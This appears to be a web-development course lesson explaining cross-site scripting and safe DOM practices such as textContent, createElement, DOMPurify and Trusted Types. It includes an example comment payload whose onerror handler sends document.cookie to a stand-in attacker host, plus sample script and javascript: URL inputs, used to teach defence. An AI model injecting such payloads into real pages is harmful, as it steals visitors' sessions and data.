Sanitization and the XSS threat model
Why innerHTML with user data is dangerous, what an XSS attack actually does, and the safe alternatives.
You finished a course on the DOM. You know how to read it, change it, listen to it, and update it without breaking accessibility. The last skill is the one that keeps you out of incident reports: don't ship cross-site scripting holes.
Cross-site scripting (XSS) is the family of bugs where an attacker gets your page to run JavaScript they wrote. They do not need to break into your server; they only need to get your page to insert a string they control as if it were code. From there, your user is the victim — the attacker now runs in their session.
The good news: the rule that prevents almost all of it is the same rule lesson 3 introduced. This lesson explains why that rule matters and what to do in the cases where you cannot follow it as-is.
What XSS actually does
Imagine your app shows a comment under each blog post. You read the comment text from a database and insert it into the page like this:
// DON'T:
const el = document.querySelector('.comment');
el.innerHTML = comment.text;A friendly comment is just text and renders as text. Now suppose someone posts a comment whose content is:
<img src="x" onerror="fetch('https://evil.example/steal?c=' + document.cookie)">The browser parses that string as HTML. It builds a real <img> element. The src="x" is invalid, so the image fails to load — and that triggers the onerror handler, which fires a request to the attacker's server with the user's cookies attached. Every visitor who reads that comment quietly hands over their session.
That is a complete XSS attack. The attacker did not touch your server. They typed text. Your page was the loaded gun; their text was the trigger; innerHTML pulled the trigger.
Other things attackers can do once they execute JavaScript in your page:
- Read any data the user can read — emails, messages, account info — and send it elsewhere.
- Make requests to your API as the logged-in user. Change passwords. Move money. Send messages.
- Show a fake login form on your real domain to harvest credentials.
The rule of thumb for the threat model: if an attacker controls a string and your code parses it as HTML or JavaScript, the attacker now controls your page in the user's browser.
nameEl.innerHTML = user.name. A user signs up with the name <script>alert(1)</script>. They reload the page. What happens?The rule that prevents almost all of it
Almost every XSS bug fits the same shape: user-controlled string → parsed as HTML or JavaScript by your code. The rule that prevents almost all of those bugs is one line:
Use
textContentfor any string that touched user input. ReserveinnerHTMLfor strings you wrote yourself.
If you only write text, an attacker can post <script> tags all day; you write the literal characters into a text node and the browser shows them as characters. There is no parser to trick.
The same rule extends to several lookalike methods:
element.innerHTML = userText— bad. UsetextContent.element.outerHTML = userText— bad. Same parser, more dangerous (replaces the element itself).element.insertAdjacentHTML(pos, userText)— bad. Same parser.document.write(userText)— bad, and writedocument.writeout of your vocabulary altogether.<a href={userUrl}>whereuserUrlcould bejavascript:alert(1)— bad. Validate the URL or strip thejavascript:scheme.
The safe equivalents:
- Text into an element:
element.textContent = userText. - Build markup with user data inside:
createElementfor the structure,textContentfor any user pieces,setAttribute(or properties) for attributes.
// Safe construction — no parsing of user input:
const li = document.createElement('li');
li.className = 'comment';
const author = document.createElement('strong');
author.textContent = comment.author; // text node, attacker-proof
const body = document.createElement('span');
body.textContent = comment.text; // text node, attacker-proof
li.append(author, ': ', body);
list.append(li);Notice what happened. We built the structure ourselves with createElement, set the user-controlled parts as text, and the browser never parsed an attacker-controlled string. There is nowhere for an attack to land.
When you find yourself building an HTML string by concatenating user input with tags, stop. That is the exact shape that creates XSS bugs. Build the elements with createElement instead, and put the user input through textContent or attribute setters.
When you do need formatting
Sometimes you genuinely need to render user-supplied content with formatting. A comment that allows bold, italic, and links. A markdown editor. A rich-text field.
You have two safe paths.
One, render through a format you control. If the user writes Markdown, parse the Markdown server-side or with a trusted Markdown library, then escape the parts that come from the user. The library produces a known-safe HTML subset; you do not parse the raw user input as HTML at all.
Two, sanitize. A sanitizer takes an HTML string and returns a stripped-down version with dangerous tags and attributes removed: no <script>, no onerror, no javascript: URLs. The standard pick is DOMPurify — a small, well-audited library that you call once per insertion.
import DOMPurify from 'dompurify'; const clean = DOMPurify.sanitize(comment.html); commentEl.innerHTML = clean;
The wrong way to sanitize: write your own regex-based "remove <script> tags" function. The list of dangerous patterns is long, evolving, and full of obscure cases (data: URLs, SVG event handlers, mutation XSS via parser quirks). A proper sanitizer takes years of issues and patches to ship safely. Use DOMPurify; do not invent your own.
Sanitize on the way in and on the way out, or be very clear about which one you do. Sanitizing only on save means your stored data is clean — but a future bug could still render unsanitized data inserted by another path. Sanitizing on render is more defensive.
Trusted Types in one paragraph
Modern browsers offer a feature called Trusted Types that bans raw strings from being assigned to dangerous sinks like innerHTML. With Trusted Types enabled (via a Content-Security-Policy header), only special "trusted" objects produced by an explicit policy can be assigned. That means: a future bug that does innerHTML = userText does not silently work — it throws a runtime error your CSP report will catch.
You do not need this on day one. You need to know it exists, and that turning it on later is one of the cleanest ways to make sure no future code reintroduces the bug class. Look it up when you have time; it is worth the read.
A short checklist
The whole lesson, in five lines:
- Default to
textContent. It can never execute markup. - Reach for
innerHTMLonly with strings you wrote yourself. - For rich user content, use a sanitizer like DOMPurify — never a hand-rolled regex.
- Validate URLs that come from users before assigning to
href. Rejectjavascript:. - When in doubt, build with
createElementandtextContent. The browser never parses an attacker-controlled string.
anchor.href = profile.url, where profile.url came from a user signup. What is the smallest fix that closes a real attack?